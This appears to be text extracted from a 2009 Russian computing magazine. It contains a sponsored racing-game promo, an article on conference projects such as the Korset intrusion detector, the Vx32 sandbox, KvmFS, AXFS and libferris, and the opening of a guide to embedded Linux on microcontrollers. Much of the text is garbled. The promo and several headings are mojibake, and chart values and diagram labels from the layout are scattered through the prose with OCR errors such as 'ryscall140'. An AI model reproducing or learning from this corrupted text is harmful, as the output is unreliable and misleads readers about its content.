äåíüãè. Çàðàáîòàòü èõ â èãðå ìîæíî òîëüêî îäíèì 

ñïîñîáîì – ó÷àñòèåì â çàåçäàõ. Çàåçäû ìîãóò 

áûòü êàê ñïîíñîðñêèìè (â ðàìêàõ ñóïåðêóáêîâ 

Alpine è MSN.ru), òàê è îáû÷íûìè, ñ äåíåæíîé 

ñòàâêîé. Ïîñëå êàæäîé óäà÷íîé ãîíêè êîìïüþòåð 

áóäåò íàãðàæäàòü òåáÿ íåîáõîäèìûì êîëè÷åñòâîì 

î÷êîâ, êîòîðûå ôîðìèðóþò òâîé ðåéòèíã. Èìåííî 

îí, à òàêæå äåíüãè, âûèãðàííûå â ãîíêå, ÿâëÿþòñÿ 

ïîêàçàòåëÿìè ëè÷íîãî óñïåõà â èãðå. 

×òî êàñàåòñÿ åæåìåñÿ÷íûõ ñïîíñîðñêèõ Ñóïåðêóáêîâ 

îò Alpine è MSN.ru, òî ïðèíöèïû òóò òî÷íî 

òàêèå æå, êàê è â îáû÷íûõ çàåçäàõ: çäåñü ìîæíî 

óâåëè÷èòü ïåðñîíàëüíûé ðåéòèíã è íàêîïèòü 

ñîáñòâåííûé êàïèòàë íà òþíèíã ñâîåãî âèðòóàëüíîãî 

Opel. 

È åùå îäèí íþàíñ: ïåðåä êàæäîé ãîíêîé êîìïüþòåð 

ïðåäëîæèò òåáå íà âûáîð 3 âàðèàíòà íàñòðîåê 

àâòî: îò óìåðåííî-áåçîïàñíîãî äî ðèñêîâàííîàãðåññèâíîãî. 

Çäåñü òîæå íåò íè÷åãî ñëîæíîãî. 

Åçäà â ñïîêîéíîì ðåæèìå áîëåå ïðåäñêàçóåìà 

è ñòàáèëüíà, õîòÿ, îòêðîâåííî ãîâîðÿ, õàðàêòåð 

àâòîìîáèëÿ â ýòîì ñëó÷àå áóäåò íåìíîãî âÿëûì. 

È íàîáîðîò, àãðåññèâíûé ðåæèì åçäû îïàñåí òåì, 

÷òî ñïîñîáåí ïðèâåñòè ê ïîëîìêàì àâòî ïðÿìî â 

ìîìåíò ãîíêè! Ðèñêîâàòü èëè èäòè ïðîâåðåííûì 

áåçîïàñíûì ïóòåì – ñèòóàöèÿ ñàìà ïîäñêàæåò 

êàê áûòü â òîì èëè èíîì ñëó÷àå. Âûáîð ëèøü çà 

òîáîé. 

Íó, à êàê ïîòðàòèòü ñîáñòâåííûå äåíüãè – ðåøàòü 

òåáå. Ïóñòèòü âåñü âûèãðûø íà ïîêóïêó òþíèíãäåâàéñîâ, 

ïîñòàâèòü âñå íà êîí è æäàòü ñåðüåçíîãî 

ñîïåðíèêà, èëè âîâñå ïðîäàòü ñâîå àâòî è 

êóïèòü áîëåå ìîùíûé è äîðîãîé âàðèàíò Opel 

OPC. Êàê âèäèøü, ñâîáîäû ñàìîâûðàæåíèÿ â èãðå 

ïðåäîñòàòî÷íî! 

Òåïåðü ïàðó ñëîâ î òîì, ðàäè ÷åãî ìû äàåì òåáå 

òàêèå âîçìîæíîñòè. 

Â ìåíþ èãðû ñóùåñòâóåò ñâîåîáðàçíûé «õîëë 

ñëàâû», â êîòîðûé êàæäûé ìåñÿö ïîïàäàþò òîëüêî 

ñàìûå ëó÷øèå ãîíùèêè! Ïîïàñòü òóäà – ýòî ñàìàÿ 

âàæíàÿ äëÿ òåáÿ ìèññèÿ! Ïîñêîëüêó, êàæäûé ìåñÿö 

ñ÷àñòëèâ÷èêîâ æäóò óìîïîìðà÷èòåëüíûå ïðèçû 

îò íàñ è íàøèõ ñïîíñîðîâ! Äàâàé ïîñìîòðèì, ÷òî 

òàì! 

1. Îò Alpine: íîâåéøèå CD-ðåñèâåðû, ñàáâóôåðû, 

äèíàìèêè, êîíòðîëëåðû IPod ñ Bluetooth èç íîâîãî 

ìîäåëüíîãî ðÿäà Alpine. 

2. Îò ÐÎÑÍÎ: ñåðòèôèêàò ÐÎÑÍÎ íà 50 000 ðóáëåé 

(ñåðòèôèêàò äàåò ïðàâî íà ñêèäêó â ðàçìåðå 

óêàçàííîé ñóììû) 

3. Îò MAXI Tunung: ôèðìåííûå âûñîêîîêòàíîâûå 

ôóòáîëêè, ïîëóãîäîâûå è ãîäîâûå ïîäïèñêè íà 

æóðíàë 

È, íàêîíåö, ñóïåðïðèç! Êîìïàíèÿ Opel ïðåäîñòàâèò 

ëó÷øåìó èãðîêó ãîäà íîâåíüêèé è àáñîëþòíî 

ðåàëüíûé àâòîìîáèëü Opel Corsa!!!!! 

Êðîìå òîãî, ïî èòîãàì ìåñÿöà òðè ëó÷øèõ ãîíùèêà 

ïîëó÷àò ñåðòèôèêàòû îò Cordiant ñ 15% ñêèäêîé 

íà ïîêóïêó ëþáîãî êîìïëåêòà ôèðìåííûõ øèí 

Cordiant è áåñïëàòíûé øèíîìîíòàæ â ïðèäà÷ó! 

Æäàòü íåêîãäà! Ó òåáÿ åùå åñòü âðåìÿ âñòàòü íà 

ñòàðòîâóþ ëèíèþ è äîæäàòüñÿ äîëãîæäàííîé 

îòìàøêè. Ìû æäåì òåáÿ è òâîé àâòîìîáèëü íà 

ôèíèøå! Ïîâåðü, ó òåáÿ åñòü íåîòúåìëåìîå ïðàâî 

ñòàòü ëó÷øèì! Íå îòêëàäûâàé æåëàííóþ ïîáåäó íà 

çàâòðà. Êëèêíè íà ãàç! 

ÇÈÌÀ ÎÒÌÅÍßÅÒÑß! ÇÀÁÓÄÜ Î ÌÈÍÓÑÎÂÛÕ ÒÅÌÏÅÐÀÒÓÐÀÕ, ÃÐßÇÍÛÕ ÒÐÀÑÑÀÕ È ÒÎËÑÒÎÌ ÑËÎÅ ÑÍÅÃÀ! 

ÑÒÓÆÀ ÏÎÁÅÆÄÅÍÀ! ÂÏÅÐÅÄÈ Ó ÒÅÁß ÑÀÌÛÉ ÍÀÑÒÎßÙÈÉ ÃÎÍÎ×ÍÛÉ ÑÅÇÎÍ! ÌÛ ÐÀÄÛ ÏÐÅÄÑÒÀÂÈÒÜ 

ÒÅÁÅ ÍÀØ, ÏÎ-ËÅÒÍÅÌÓ ÆÀÐÊÈÉ, ÑÓÏÅÐÏÐÎÅÊÒ MAXI RACING! ÏÐÈÑÒÅÃÈÂÀÉ ÐÅÌÍÈ ÍÀ ÎÔÈÑÍÎÌ 

ÊÐÅÑËÅ, ÃÎÍÊÀ ÍÀ×ÈÍÀÅÒÑß!

unixoid 

а. б. в. 

50 

40 

30 

50 

40 

30 

94 

64 

RAM 

Flash 

20 

20 

32 

10 

0 

AXFS JFFS2 CRAMFS SQUASHFS 

10 

0 

AXFS SQUASHFS XIP AXFS XIP CRAMFS 

0 

JFFS2 SQUASHFS AXFS 

БЕНЧМАРКИ AXFS: СКОРОСТЬ ЗАПУСКА ПРИЛОЖЕНИЯ (А), РАЗМЕР ОБРАЗА ФС (Б), ОБЩИЙ УРОВЕНЬ ПОТ- 

РЕБЛЕНИЯ ПАМЯТИ (СООТНОШЕНИЕ RAM/FLASH) (В) 

ЕВГЕНИЙ «J1M» ЗОБНИН 

/ ZOBNIN@GMAIL.COM/ 

Обреченные 

на успех 

Îáçîð ñàìûõ èíòåðåñíûõ ïðîåêòîâ, ïðåäñòàâëåííûõ íà UNIX-êîíôåðåíöèÿõ 

Åæåãîäíî ïî âñåìó ìèðó ïðîõîäèò ìíîæåñòâî êîíôåðåíöèé, òàê èëè èíà÷å 

ñâÿçàííûõ ñ UNIX è FOSS. Ó÷àñòèå IT-ñïåöèàëèñòà â ïðîãðàììå îäíîé èç íèõ 

— îòëè÷íûé ñïîñîá âûäåëèòüñÿ, ïðîäåìîíñòðèðîâàòü íåîðäèíàðíîñòü ñâîåãî 

ìûøëåíèÿ è óìåíèå èçëàãàòü ìûñëè. Ìû îçíàêîìèìñÿ ñ ïÿòüþ íàèáîëåå 

êðåàòèâíûìè ïðîåêòàìè, ïðåäñòàâëåííûìè íà êîíôåðåíöèÿõ USENIX è Linux 

Symposium çà ïîñëåäíèå äâà ãîäà. 

>> unixoid 

KORSET — HIDS БЕЗ ЛОЖНЫХ СРАБАТЫВАНИЙ 

Феноменальная популярность небезопасных языков программирования 

C и C++ оказалась фатальной с появлением интернета и сетевых 

технологий. Проблеме срыва стека уже свыше 25 лет, но эффективного 

ее решения до сих пор не придумано. Производители железа снабжают 

процессоры NX-битом, который, как оказалось, способен остановить 

только учителей информатики. В операционные системы встраивают 

разнообразные рандомизаторы адресов, — они хоть и усложняют 

процесс внедрения shell-кода, но также легко обходятся. Создатели 

компиляторов не отстают и придумывают прополисы и прочие расширения. 

Идеалисты постоянно кричат о типо-безопасных языках и виртуальных 

машинах. Каждый год исследователи представляют новые системы 

защиты, но явного прогресса нет и кажется, что эффективное решение не 

будет найдено никогда. 

Несколько в стороне от всей этой кутерьмы стоят разработчики хостовых 

систем обнаружения вторжений (HIDS). Они предлагают искать лекарство 

не от самой болезни, а от ее симптомов: раз уж от срыва стека и смежных 

методов проникновения защититься нельзя, то почему бы не пресечь их 

последствия, запретив программе делать то, чего она делать не должна. 

080 

Существует два типа HIDS: обучаемые и основанные на правилах. Слабость 

первых в необходимости предварительного «прогона» 

приложе ния, — обучаемой HIDS нужно время на анализ того, что обычно 

делает приложение, чтобы уже потом на основе этих данных ограничить 

софтину в возможностях. В то же время такая HIDS просто технически не 

способна узнать обо всем, что может приложение, и довольно часто дает 

ложные срабатывания. 

HIDS, основанные на правилах, действуют по-другому. Они предлагают 

пользователю самому составить список того, что дозволено приложению 

(какие системные вызовы разрешены, к каким файлам и устройствам оно 

может обращаться и т.д.), а все остальные действия будут пресекаться. 

Недостаток: чтобы точно составить правила, нужно серьезно попотеть 

(попробуй как-нибудь на досуге написать список правил SELinux для 

Apache и всех его модулей с нуля). 

Разработчики концептуальной HIDS Korset (www.korset.org), анонсированной 

на Linux Symposium 2008, предложили объединить оба типа 

систем обнаружения вторжений для создания сверхнадежной HIDS, 

работающей без вмешательства пользователя и не требующей обучения 

или написания правил. Korset базируется на идее Control Flow Graph 

XÀÊÅÐ 04 /124/ 09

unixoid 

ПРИНЦИП РАБОТЫ KORSET 

User Space 

System Calls 

Kernel Space 

example c 

example 

i=read(fd, buf, n); 

if (i==n) { 

write(fd, buf, n); 

} 

close(fd); 

gcc, ld, ... 

ELF 

executable 

Korset 

Monitoring 

Agent 

Kernel 

System Call 

Handler 

Korset Static Analyzer 

ГРАФИЧЕСКОЕ ПРЕДСТАВЛЕНИЕ 

ГРАФА ФУНКЦИИ FWRITE() 

read 

write 

close 

example. korset 

1)syscall90 

2)fwrite() 

3)ryscall140 

4)syscall91 

5)syscall125 

6)syscall+5 

7) syscall4 

8) syscall197 

9) syscall10S 

10) syscall54 

АДРЕСНОЕ ПРОСТРАНСТВО ПРО- 

ЦЕССА, РАБОТАЮЩЕГО ПОД КОНТ- 

РОЛЕМ VX32 

Host Operating System 

Kernel Address Space 

(x86-32 or x86-64) 

1 

3 

5 

6 

7 

8 

9 

10 

2 

4 

Host Application 

Address Space 

(x86-32 or x86-64) 

(quest address space expands 

as heap grows) 

ДИСКОВЫЙ ФОРМАТ AXFS 

Flat Model 

Code, Data 

Segments 

quest heap 

quest code, data, bss 

default quest stack 

Guest Address Space 

(always x86-32) 

quest execution state, 

code tragment cache 

0 

Guest 

Data 

Segment 

Guest 

Control 

Segment 

SUPERBLOCK 

Region Descriptor 




vx32 sandbox library 

Region - file names 

Host Application 

code, data, bss, heap 

(x86-32 or x86-64) 

Region - node offsets 

Region - compressed nodes 

0 

Region - xip nodes 

XÀÊÅÐ 04 /124/ 09 

081

unixoid 

(CFG), который представляет собой граф, отражающий очередность 

выполнения системных вызовов приложением. Такой граф строится 

автоматически во время сборки приложения и загружается ядром перед 

его исполнением. Если во время работы процесс инициирует системные 

вызовы, не описанные в графе, или даже делает их не в том порядке — 

процесс завершается. 

Чтобы воплотить мысль в реальность, создатели Korset снабдили GNU 

build tools (gcc, ld, as, ar) специальными обертками, которые строят 

CFG на основе исходных текстов и объектных файлов приложения. Для 

реализации сидящего в ядре Monitoring Agent был модифицирован ELFзагрузчик, 

который во время загрузки исполняемого файла в память находит 

и загружает закрепленный за ним CFG (файл приложение .korset). 

Специальная хук-функция security_system_call, прописанная в структуре 

security_operations, запускается при каждом системном вызове и сверяет 

его с записью в CFG. Ну, а чтобы связать все это воедино, в структуру 

task_struct добавили ссылку на CFG и его состояние. 

На первый взгляд, Korset прост в реализации и удобен в использовании. 

Но не все так радужно. Во-первых, CFG убивает возможность 

генерации кода на лету, без которой в некоторых случаях просто не 

обойтись. Во-вторых, CFG — не панацея. Если взломщик умудрится 

оформить системные вызовы shell-кода таким образом, чтобы они 

соответствовали прописанным в CFG (например, сделает open(), 

но не конфигурационного файла, а псевдотерминала), то ничто не помешает 

ему в проникновении. Ну и, в-третьих, в текущем состоянии 

Korset далек от продакшн: работа только на x86, с программами без 

динамической линковки, многопоточности, сигналов и инструкций 

вроде setjmp и longjmp. 

VX32 — ПЕСОЧНИЦА В ПРОСТРАНСТВЕ ПОЛЬЗОВАТЕЛЯ 

Идея использовать песочницы для запуска небезопасного кода далеко 

не нова. Близкие примеры: Chroot, FreeBSD Jail, Linux Lguest, Solaris 

Zones. JavaVM — тоже своего рода песочница, принуждающая использовать 

типо-безопасный язык для создания приложений и применяющая 

многочисленные рантайм проверки на безопасность. Даже VMWare 

и qemu есть не что иное, как песочницы, позволяющие запустить ОС в 

изолированном виртуальном окружении. 

Особого внимания заслуживают песочницы, основанные на прозрачной 

трансляции опкодов x86. Чтобы понять, что это такое, представь себе 

Java, которая умеет исполнять обычный x86-код, скомпилированный 

с помощью gcc. При этом подконтрольная программа не может выйти 

за границы своей области памяти и навредить работе виртуальной 

машины. Единственный путь наружу — специальный API. Ничего кроме 

для нее не существует. Такой вид песочниц наиболее интересен, потому 

как не требует вмешательств в ядро, не принуждает к использованию 

типо-безопасных языков, транслируемых в байт-код, не эмулирует целую 

аппаратную платформу и позволяет как угодно ограничить исполняемую 

программу с помощью урезания API до минимума. На его основе даже 

можно построить целую операционную систему, работающую в пространстве 

пользователя. 

К сожалению, популярности такой тип песочниц не получил. Реализация 

требует софтверной интерпретации инструкций процессора (с целью их 

модификации), ведь чтобы подконтрольное приложение оставалось в 

изоляции, нельзя допустить, чтобы оно смогло производить системные 

вызовы или обращаться к функциям, не оговоренным в API (инструкции 

int и call). Нельзя передавать управление на код за пределами своего адресного 

пространства (jmp) или читать данные вне своей зоны видимости 

(тут уж совсем засада). Поэтому инструкции должны анализироваться 

и при необходимости исправляться. Как следствие: на порядки отстает 

производительность. 

Проект Vx32 (pdos.csail.mit.edu/~baford/vm), представленный на 

конференции USENIX’08, вдохнул в идею подобных песочниц новую 

жизнь благодаря одному хитрому приему, который позволил вывести 

производительность чуть ли не на уровень нэйтивного кода. Все 

дело в границах области данных. Обычно для ограничения области 

данных подконтрольной программы интерпретаторы анализируют 

все куски кода, содержащие хоть какое-то упоминание об адресе, 

082 

будь то чтение из буфера, работа со стеком или обращение к файлу. 

Анализируется и, в случае необходимости, исправляется каждая 

инструкция, несущая в себе адрес. В то же время на долю различных 

переходов и обращений к подпрограммам остается жалкий процент 

действий, не несущий особой нагрузки на интерпретатор. Разработчики 

Vx32, отлично это понимая, просто ограничили область 

данных программы сегментными регистрами (ds, es, ss), которые 

все равно не применяются в современных ОС из-за плоской модели 

памяти. В результате, интерпретатор Vx32 должен заботиться только 

об анализе инструкций-переходов (число которых очень мало: jmp и 

производные, call, int, ret) и пресекать попытки изменения сегментных 

регистров, а самую трудоемкую работу по соблюдению границ 

видимости области данных выполнит процессор, который делает 

это в сотни раз быстрее. Уже сейчас Vx32 стабильно работает, а на его 

основе создано несколько проектов, среди которых ОС Plan9, работающая 

в режиме хост-системы, и «эмулятор» Linux (Linux API поверх Vx32). 

Производительность этих систем приближается к нэйтивному коду 

(оверхед редко превышает 80%). Недостаток же у системы всего один: 

привязанность к x86. 

KVMFS — УДАЛЕННОЕ УПРАВЛЕНИЕ 

ВИРТУАЛЬНЫМИ СЕРВЕРАМИ 

Технологии виртуализации плотно вошли в нашу жизнь. Разработчики 

используют виртуальные машины для прогонки и отладки низкоуровнего 

кода, администраторы — чтобы сэкономить на покупке железных 

ВИРТУАЛИЗАЦИЯ 

ПРИМЕНЯЕТСЯ В КЛАСТЕРАХ 

ПОВЫШЕННОЙ 

ПРОИЗВОДИТЕЛЬНОСТИ (HPC) 

ДЛЯ ЭФФЕКТИВНОГО 

ИСПОЛЬЗОВАНИЯ ВСЕХ ЯДЕР 

СОВРЕМЕННЫХ МНОГОЯДЕР- 

НЫХ ПРОЦЕССОРОВ. 

серверов, а хостеры начали применять технологии виртуализации с 

целью создать иллюзию постоянной доступности сервера. Особенно 

полюбились виртуальные сервера сервисам по сдаче в аренду компьютерных 

мощностей (теперь для каждого клиента они могут выделить 

отдельный виртуальный сервер и при необходимости перенести его на 

другую машину). Виртуализация применяется в кластерах повышенной 

производительности (HPC) для эффективного использования всех ядер 

современных многоядерных процессоров (для каждого ядра — отдельная 

виртуальная машина). 

Бум популярности виртуализации начался сразу после появления ее 

поддержки в современных x86-процессорах. Теперь виртуальный сервер 

может работать без явного оверхеда и модификации практически на 

любой ОС, оснащенной соответствующим драйвером. 

В Linux такой драйвер называется kvm, и для его задействования обычно 

применяется виртуальная машина qemu. Сама по себе qemu представляет 

множество интересных возможностей для управления серверами, включая 

функции заморозки/разморозки, простой способ миграции по Сети, 

поддержку сжатых образов дисков и т.д. Управлять сервером с помощью 

qemu одно удовольствие, но если таких серверов сотни, а то и тысячи, и все 

они разбросаны по множеству машин, начинаются серьезные проблемы. 

Проект KvmFS, представленный на Linux Symposium 2007, как раз 

и призван упростить процесс администрирования множества уда- 

XÀÊÅÐ 04 /124/ 09

unixoid 

ленных виртуальных машин. KvmFS использует протокол 9P (тот, 

что из Plan9) для создания виртуальной файловой системы, которую 

можно удаленно монтировать, например из Linux, и управлять 

множеством инстанций qemu на удаленном сервере путем записи 

специальных команд в файлы. Сервер KvmFS прочитает команды 

и отправит их нужному процессу qemu. Для наглядности далее 

приводится пример запуска виртуальной машины на сервере host. 

org: 

# mount -t 9p host.org /mnt/9 

# cd /mnt/9 

# tail -f clone & 

# cd 0 

# cp ~/disk.img fs/disk.img 

# cp ~/vmstate fs/vmstate 

# echo dev hda disk.img > ctl 

# echo net 0 00:11:22:33:44:55 > ctl 

# echo power on freeze > ctl 

# echo loadvm vmstate > ctl 

# echo unfreeze > ctl 

А вот так производится миграция виртуального сервера на другую машину: 

# mount -t 9p host1.org /mnt/9/1 

# mount -t 9p host2.org /mnt/9/2 

# tail -f /mnt/9/2/clone & 

# cd /mnt/9/1/0 

# echo freeze > ctl 

# echo 'clone 0 host2.org!7777/0' > ctl 

# echo power off > ctl 

Даже если машин с виртуальными серверами в сети сотни, не составит 

особого труда написать небольшой скрипт, который проходит по списку 

адресов и монтирует их все к нужным точкам. 

AXFS — ЗАПУСК ПРИЛОЖЕНИЙ БЕЗ ПОМЕЩЕНИЯ В RAM 

Linux стремительно завоевывает рынок мобильной и встраиваемой 

техники. Все больше производителей смартфонов заявляют об использовании 

открытой ОС в следующих моделях своих устройств. Множество 

компаний выдвигают на рынок специальные версии дистрибутивов 

Linux для мобильных устройств. Линус Торвальдс пропускает в ядро 

огромное количество патчей с реализацией поддержки того или иного 

мобильного оборудования и кажется, что хакерский рай уже так близко… 

К сожалению, не все так просто. Изначально ядро Linux разрабатывалось 

для рабочих станций и серверов, и только совсем недавно тукс 

потянул крылышки к смартфонам. Поэтому почти все подсистемы ядра 

рассчитаны (и оптимизированы) на применение в стандартных настольных 

конфигурациях, которые непременно обладают жесткими дисками, 

быстрым видеоадаптером, большим объемом оперативной памяти и 

весьма нескромной производительностью. Некоторые из этих проблем 

решаются достаточно просто. Например, требуемые объемы памяти можно 

понизить до приемлемого уровня, собрав ядро с поддержкой только 

самого необходимого и потюнив систему через /proc. Низкопроизводительная 

видеоподсистема? Ну, тогда и тяжелый X Server не нужен, хватит 

framebuffer’а! А вот с остальным сложнее. В частности, в ядре до сих пор 

нет файловой системы, позволяющей использовать все возможности 

современных flash-накопителей. 

Список фич, которыми должна обладать такая файловая система, следующий: 

1. Переписывание данных только в случае крайней необходимости. 

Основанные на flash-памяти накопители имеют ограничение по части 

количества циклов перезаписи. 

2. Прозрачное сжатие данных. 

3. Умение работать без уровня эмуляции блочного устройства, который 

создает совершенно ненужный оверхед. 

XÀÊÅÐ 04 /124/ 09 

4. Устойчивость к перебоям питания. 

5. Поддержка XIP (eXecute-In-Place), т.е. возможности запустить программу 

прямо с flash-накопителя, без загрузки в оперативную память. 

Давно интегрированная в ядро jffs2 не поддерживает и половины этих 

возможностей, а вот созданная компанией Nokia ubifs (интегрирована 

в ядро 2.6.27) очень хороша и умеет почти все, кроме пятого пункта. За 

счет XIP можно сделать большой шаг вперед. Поясню. На мобильных 

устройствах операционная система обычно прошивается в память типа 

NOR, которая, в отличие от используемой во флешках NAND-памяти, 

поддерживает обращение к произвольным ячейкам. Произвольный 

доступ делает ее очень похожей на оперативную память и даже позволяет 

использовать в этом качестве. Надо только научить файловую систему 

мапить отдельные участки NOR-памяти в память виртуальную — и, о 

чудо, полноценная операционная система может работать, не потребляя 

RAM. 

Загвоздка с XIP лишь в том, что это технология никак не вписывается 

в дизайн универсальной операционной системы. По сути это хак, 

который пытается смешать несовместимые подсистемы ядра. Создатели 

файловой системы AXFS (Advanced XIP File System), анонсированной на 

Linux Symposium 2008, попытались исправить этот недочет при помощи 

официальных механизмов ядра. Еще в ядро 2.6.13, в рамках интеграции 

dcss-драйвера для архитектуры s390, был добавлен специальный 

механизм, позволяющий обращаться к памяти flash-диска напрямую 

(файл /mm/filemap_xip.c). До создателей AXFS этот механизм попытались 

использовать разработчики xip-патчей для cramfs, но в результате 

получили грязный хак, который никак нельзя было выдать за оптимальное 

решение. Разработчики же AXFS проконсультировались с авторами 

подсистемы виртуальной памяти и создали 64-битную файловую систему, 

достоинства которой: 

1. XIP для памяти NOR-типа. 

2. Возможность работать с NAND-памятью (XIP автоматически отключается). 

3. Прозрачная компрессия с размером блока от 4 Кб до 4 Гб. 

4. Умение работать как с блочными устройствами, так и напрямую. 

Записывать она не умеет (образ файловой системы создается специальной 

утилитой), но это и не требуется для прошивок, выпускаемых 

производителем аппарата. 

LIBFERRIS — НОВЫЙ УРОВЕНЬ ВИРТУАЛЬНЫХ ФС 

В последнее время виртуальные файловые системы завоевали особую 

популярность. Пользователей они привлекают своей универсальностью, 

благодаря которой не нужно тратить время на изучение новых 

интерфейсов и чтение мануалов. С точки зрения программистов, 

виртуальная ФС — очень удобный и простой способ связывания компонентов 

большой системы без выдумывания нового API и использования 

сложных RPC. 

Чтобы не быть голословным, приведу лишь некоторые примеры 

из громадного списка таких ФС: подсистема Gnome VFS, которая 

позволяет«ходить»по архивам, ssh-сессиям, ISO-образам; подсистема 

KDE KIO, разработанная для тех же целей; ядерный модуль fuse, на основе 

которого создано просто гигантское количество самых разнообразных 

файловых систем. А если уж мыслить в более глобальных масштабах, то 

не обойтись без упоминания об операционных системах Inferno и Plan9, 

где виртуальные ФС являются центральной частью ОС и связывают все 

компоненты системы в единый комплекс. 

Проект libferris (www.libferris.com), которому была посвящена 

одна из лекций Linux Symposium, в этом плане идет еще дальше. 

Кроме возможности монтирования массы разнообразных ресурсов, 

он предлагает механизм управления приложением (Firefox, X 

Window) через файловый интерфейс, позволяет легко преобразовать 

XML-документ в файловую систему и обратно, поддерживает 

атрибуты, которые на лету извлекаются из внутренних метаданных 

документа, и обладает еще массой интересных особенностей. 

Другими словами, проект libferris выводит виртуальные ФС на 

новый уровень, который раньше был доступен лишь в упомянутом 

Plan9. z 

083

unixoid 

DIVER 

/ DIVER@EDU.IOFFE.RU / 

Встраиваем 

пингвина 

Ó÷èìñÿ ñòàâèòü Linux íà ìèêðîêîíòðîëëåðû 

Îòêðûòîñòü è ãèáêîñòü GNU/Linux ïîçâîëÿåò çàòî÷èòü åå áóêâàëüíî ïîä ÷òî 

óãîäíî. Ýòà ÎÑ îäèíàêîâî õîðîøî ðàáîòàåò íà ìàðøðóòèçàòîðàõ, ìîáèëüíèêàõ 

è ïðîôåññèîíàëüíûõ ñèñòåìàõ ñáîðà äàííûõ – â îáùåì, íà òàê íàçûâàåìûõ 

âñòðàèâàåìûõ óñòðîéñòâàõ. Êàê ýòîãî äîáèâàþòñÿ? 

>> unixoid 

Итак, у тебя есть Идея, и звучит она так: «Хочу Linux на Микроконтроллере». 

Как и почти любую замечательную Идею, ее придумали еще до тебя 

и уже досконально проработали опытные линуксоиды и программисты. 

Для начала определись с задачей. Что твое устройство будет делать? 

Как будет реагировать на внешние раздражители? Задай себе главный 

вопрос: ЗАЧЕМ тебе здесь Linux? Если определился, выбирай девайс, 

на который твоя ОСь будет водружаться. На нем должен быть поддерживаемый 

Linux’ом микроконтроллер, а также достаточно памяти и 

быстродействия для твоих задач. В идеале, для первых экспериментов 

подойдет какой-нибудь простенький роутер (типа D-Link на MIPS-архитектуре, 

с уже предустановленным Linux’ом). Перекомпиль ядро под 

свою задачу и залей обратно на роутер, — это и будет первый опыт. 

Дальше можешь спаять или купить какую-нибудь отладочную плату. 

Только следи, чтобы на твоем одноплатнике было не менее 16 Мб оперативки, 

и контроллер имел Блок Управления Памятью MMU (смотри врезку), 

иначе придется довольствоваться сильно урезанным ядром ucLinux. 

Как запустишь ядро и примонтируешь файловую систему, пиши или ищи 

драйвера для интерфейсов и внешней периферии. 

Обобщим. Для более-менее успешной реализации Идеи, тебе надо: 

• Знать основы микроэлектроники. 

• Знать язык С (желательно Асм). 

• Уметь ориентироваться в Datasheets и прочей документации к контроллеру 

и его внешней периферии. 

• Иметь опыт программирования МК (базовые знания процесса загрузки 

Linux также будут нелишними). 

Звучит страшно? Но основы я расскажу здесь, а остальное прочитаешь в 

Сети, если заинтересует. 

НИЗКИЙ УРОВЕНЬ 

У любого микроконтроллера на кристалле, помимо собственно ядра, 

живет периферия. По сути, это отдельные устройства, объединенные в 

один корпус. 

Ядро управляет всей внутренней периферией путем записи или чтения 

из регистров, замапленных в специальную область памяти. Они называются 

SFR (Special Function Register). Запомни эту аббревиатуру, в документации 

к процессорам она часто используется. А само процессорное 

084 

ядро, кроме арифметики да чтения/записи в память, по сути, ничего и не 

умеет и все перекладывает на плечи периферии. 

В нашей задаче установки Linux контроллер обязательно должен иметь 

два периферийных устройства: 

1. PDC — контроллер прямого доступа к памяти. Вместо того чтобы 

«вручную» принимать данные с портов ввода-вывода и копировать их в 

оперативную память, процессорное ядро может отдать эту операцию на 

откуп контроллеру DMA (прямого доступа к памяти), и, пока тот перемещает 

данные, заниматься действительно полезным делом. По окончании 

операций с памятью, PDC дергает прерывание, и ядро переключается 

на обработку данных. 

2. Memory Management Unit (или, по-русски, Блок Управления Памятью). 

Работает в тандеме с PDC и контроллером оперативки. Главная его роль 

— это трансляция виртуальной памяти в физическую, а также контроль 

доступа. На твоем десктопе архитектуры х86/х86-64 он присутствует 

всегда, а вот в микроконтроллерах его может и не быть. Linux, как многозадачная 

система, использует этот блок для установки прав доступа 

на страницы памяти. Как только какой-нибудь код попытается взаимодействовать 

с запрещенной областью памяти, сработает аппаратное 

прерывание, обрабатываемое ядром Linux. 

Также пригодятся контроллеры карточек NAND-Flash и CompactFlash, 

но они, наверняка, присутствуют везде, где есть MMU. Остальную периферию 

тоже не следует обделять вниманием — например, периферийный 

контроллер микросхемы физического уровня Ethernet и поддержка 

USB-Host дадут тебе нехилые преимущества в возможностях. 

Как известно, процесс загрузки ОС на базе Linux, вне зависимости от 

архитектуры, происходит в несколько этапов. Вкратце напомню: при 

старте компьютера первым запускается загрузчик, подготавливающий 

все необходимое для запуска ядра — конфигурирует контроллер памяти, 

последовательный порт, стек и шину, распаковывает временный образ 

корневого раздела в память. После низкоуровневой настройки железа 

загрузчик должен найти, скопировать в память и запустить непосредственно 

ядро с нужными параметрами командной строки и окружением. В 

«больших» компьютерах типа IBM-PC первую часть загрузки выполняет 

BIOS, а вторую берет на себя загрузчик типа GRUB или LILO. 

Следом стартует ядро Linux — распаковывает себя, определяет окружа- 

XÀÊÅÐ 04 /124/ 09

unixoid 

Карта виртуальной памяти в AT91SAM9 

ющее железо, инициализирует прерывания, запускает процесс Инит и 

подцепляет корневую файловую систему. Последняя может иметь вид 

сжатого РАМ-диска и быть распакованной в память еще загрузчиком 

(или же сразу монтироваться на флеш-диске, если имеет драйвера для 

доступа к нему внутри ядра). 

Далее, процессом Инит с готовой корневой ФС, стартуются уже другие 

процессы, и выполняются стартовые скрипты. Вскоре у тебя на устройстве 

— рабочая система. 

Естественно, загрузившись, ядру надо будет выполнять свои прямые 

обязанности, делать то, ради чего система и ставилась (например, 

собирать какие-нибудь данные об окружающем мире и показывать их 

на экране по требованию, поступившему с клавиатуры). Для общения с 

периферией нужны драйвера, которым взяться в ядре неоткуда. Значит, 

следующая задача — найти или написать их. 

ЧТО НУЖНО СО СТОРОНЫ СТАРШЕГО БРАТА 

Для начала — компиляторы для сборки софта под устройство. Понятно, 

что нужны GNU’тые GCC и toolchain, ибо они входят в официальный 

инструментарий компиляции Линукса, и именно под ними он скомпилируется 

без проблем. «Обыкновенные» GNU C компиляторы под 

х86-ю архитектуру не подойдут, так как архитектура контроллера в твоем 

embedded-устройстве, полагаю, любая другая, но только не х86-я. Поэтому 

придется качать кросс-компиляторы. Для ARM7/9/11 это, например, 

GNUARM (www.gnuarm.com), для AVR — GNU AVR (есть в репозитории 

Дебиана, пакет gcc-avr), ну а для совсем маленьких устройств типа 

архитектуры С51 — SDCC (хотя туда ядро Linux уже будет проблематично 

засунуть). 

Для создания образов файловых систем нам подойдут стандартные 

утилиты типа mkfs.(что_угодно), gzip и cpio. Здесь проблем возникнуть не 
